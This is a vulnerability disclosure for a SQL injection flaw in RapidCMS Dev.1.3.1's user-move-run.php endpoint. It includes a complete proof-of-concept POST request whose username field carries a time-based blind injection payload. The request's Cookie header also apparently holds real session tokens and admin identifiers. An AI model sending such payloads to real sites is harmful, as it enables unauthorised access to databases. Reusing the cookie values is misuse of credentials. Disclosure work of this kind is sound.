代码拉取完成,页面将自动刷新
RapidCMS Dev.1.3.1 found a SQL injection vulnerability in /admin/user/user-move-run.php
RapidCMS Dev.1.3.1
https://github.com/OpenRapid/rapidcms
Parameters affected: username
POST /admin/user/user-move-run.php HTTP/1.1
Host: demo.com
Content-Length: 71
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://demo.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://demo.com/admin/user/user-move.php?username=admin
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: deviceid=1722062988348; xinhu_ca_rempass=0; t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MjY6InBocCB8IHBocD8gfCBwaHRtbCB8IHNodG1sIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1723172185; csrf_358693=2df7a84f; SECKEY_ABVK=OwAgykiuZ90JyymTDay7TVxsu9K7i77SDQ1wYucKShE%3D; BMAP_SECKEY=zsabggfKizJ7RMP-whUACbv-8Y8e5RtMYzyqN6tgzDDcqlIgvjPYXLThdapgeYvMI5gtvLD423X1mOjreODpLfh2LBSqd-MfWUOnirBpX6X5MhDcI2h78cg9SCeZlworW5OtN5Li7126gdR5a9n2B0G1H09Eu9K-e5yMSsxdwbkojLGWbNKpJSNGySLmO3bA; lang=zh-cn; vision=rnd; device=desktop; theme=default; hideMenu=false; preExecutionID=3; executionTaskOrder=status%2Cid_desc; Hm_lvt_5964cd4b8810fcc73c98618d475213f6=1723680035; http304ok=1; qebak_loginlangid=1; csrf_f2b6b4=adc34ccd; downloading=null; storyModuleParam=0; storyProductParam=0; storyBranchParam=0; executionStoryOrder=order_desc; storyPreExecutionID=3; docSpaceParam=%7B%22type%22%3A%22execution%22%2C%22objectID%22%3A%223%22%2C%22libID%22%3A%227%22%2C%22moduleID%22%3A%220%22%2C%22browseType%22%3A%22%22%2C%22param%22%3A%220%22%7D; lastDocModule=0; lastProject=2; docFilesViewType=list; tab=doc; xinhu_ca_adminuser=admin; xinhu_mo_adminid=eg0el0gx0ttm0tut0et0mx0ml0ea0el0tuj0tuj0ee0tua0ew0mg09; user=Y4W4R2t0a9Wa46O0O0Oa; name=admin; admin=Y4W4R2t0a9Wa46O0O0Oa
Connection: keep-alive
username=' or if(length(database())>4,sleep(3),1)#&password=123456&sub=
It is found that the username parameter is directly passed in through the post method and concatenated with the SQL statement.
It is then executed via the mysqli_query() function
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。